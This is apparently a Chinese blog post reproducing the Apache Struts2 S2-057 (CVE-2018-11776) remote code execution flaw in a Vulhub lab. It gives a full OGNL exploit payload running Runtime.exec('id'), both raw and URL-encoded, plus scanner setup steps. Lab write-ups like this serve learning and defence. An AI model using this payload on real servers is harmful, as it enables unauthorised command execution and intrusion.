S2—057 远程命令执行漏洞(CVE-2018-11776)

最新推荐文章于 2024-04-25 16:32:17 发布
最新推荐文章于 2024-04-25 16:32:17 发布
阅读量1.8k 收藏
点赞数 3
分类专栏: Kali 3.0——使用Docker搭建Vulhub漏洞靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45625605/article/details/103212120
版权

一、漏洞描述:

         Apache wiki更新了一个Struts2的远程代码执行漏洞(S2-057),漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。

        当Struts2的漏洞利用以下条件时:

       - alwaysSelectFullNamespace值为true
       - action元素未设置namespace属性,或使用了通配符

        namespace将由用户从uri传入,并作为OGNL表达式计算,最终造成任意命令执行漏洞。

      影响版本:

     <=Struts 2.3.34,Struts 2.5.16

二、环境搭建

      vulhub搭建漏洞环境

三、漏洞复现

   环境启动后,访问`http://your-ip:8080/showcase/`,将可以看到Struts2的测试页面。

    

   测试OGNL表达式`${233*233}`:
   http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

    

   原始exp

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

  url编译

   

/struts2-showcase/%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d/actionChain1.action

       

四、日志

        

五、kali里Struts-scan.py搭建

       git clone https://github.com/Lucifer1993/struts-scan.git

        

 

       cd struts-scan

       sudo apt-get install python-pip
       sudo pip install termcolor

       

   启动struts-scan时出现

    

原因:注释里面出现了中文,而 Python 支持的 ASCII 码无中文。

解决办法:

python文件里配置

 在文件头部加上:

  # -*- coding:UTF-8 -*-

  

Stephen Wolf
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
远程代码执行漏洞(CVE-2018-11776)
锋刃科技的博客
07-01 3528
影响版本 Struts <= Struts 2.3.34, Struts 2.5.16 环境搭建 启动Struts 2.3.34环境: docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 漏洞利用 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码...
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
m0_49506405的博客
03-01 4668
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 启动环境后,在Win10上访问http://IP:port/struts2-showcase 1.构建Payload: 访问: http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action.
struts2-057-CVE-2018-11776
weixin_43718688的博客
03-15 145
struts2-057-CVE-2018-11776 搭建环境 首先安装git yum install git-core 安装完成之后运行一下git clone试试,如果出现选项就说明安装成功了。 之后安装docker sudo yum -y install docker-ce 尝试运行一下 docker images 如果出现镜像列表则说明成功安装。接下来就需要安装vulhub了,在这之前,需要先安装pip wget https://bootstrap.pypa.io/get-pip.py python
CVE-2024-21006-weblogic远程命令执行漏洞
最新发布
zwy15288408160的博客
04-25 1443
Oracle WebLogic Server 存在远程命令执行漏洞CVE-2024-21006),该漏洞源于T3/IIOP协议存在缺陷,未经身份验证的攻击者可通过T3/IIOP协议受影响的服务器发送恶意的请求,利用LDAP工具执行任意代码。
struts2 S2-057(CVE-2018-11776)
Z_l123的博客
03-01 1123
漏洞介绍 该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行;url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 受影响版本 <=Struts2.3.34,Struts 2.5.16 漏洞复现 1.访问地址 http://ip:port/strut..
struts2 代码执行CVE-2018-11776漏洞复现 vulfocus夺旗
muhan的博客
04-15 4380
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
Struts2 远程命令执行---检测.zip
11-15
支持S2-057 CVE-2018-11776S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测。...
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
目前Struts2官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高风险。 CVE: 英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息...
Struts2漏洞检查工具2018版.exe
07-15
S2-057 CVE-2018-11776 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 https://cwiki.apache.org/confluence/display/WW/S2-057 影响范围非常小 S2-048 CVE-2017-9791 Struts 2.3.X ...
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
Jerry____的博客
12-17 327
一:漏洞介绍 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 。 二:影响版本 Apache Struts 2.3 – Struts 2.3.34 Apache Struts 2.5 – Struts 2.5.16 三:环境搭建 1、利...
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
锋刃科技的博客
06-30 751
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
漏洞解析及复现(CVE-2018-11776
zkaqlaoniao的博客
10-29 273
Struts2是一款基于Java开发的框架,web路径下会出现两种特殊的文件格式,即*.action文件与*.jsp文件;它是基于MVC设计模式的Web应用框架,相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行
Apache Struts2高危漏洞S2-057CVE-2018-11776
weixin_33835103的博客
09-03 223
花了两天时间,特此记录 一:背景: 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞。 二:漏洞产生原理: 1.需要知道对应跳转请求的action名称 2.Struts2框架中的属性设置为: 1) struts.mapper.alwaysSelectFullNamespace = true 2) type...
Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现
bamanju0574的博客
08-21 842
参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架...
【vulhub】structs2远程命令执行 CVE-2018-11776S2-057
weixin_42884199的博客
12-06 479
前提 1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。 2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload URL: http://192.168.150.146:8080/s
Struts2 S2-057远程执行代码漏洞CVE-2018-11776
网络安全。
02-15 1207
0x01 影响版本 &amp;lt;= Struts 2.3.34,Struts 2.5.16 0x02 S2-057需要的条件 -alwaysSelectFullNamespace为true。 -action元素没有设置namespace属性,或者使用了通配符。 命名空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 0x03 漏洞触发 1.执行233*233 http://yo...
PHP 输入验证漏洞 CVE-2018-10547
10-24
根据提供的引用内容,我没有找到与“PHP 输入验证漏洞 CVE-2018-10547”相关的信息。但是,我可以为您提供有关PHP漏洞的一些信息。 引用提到了PHP 7.1.x版本中的imap_mail函数null指针取消引用的漏洞,这是一个安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值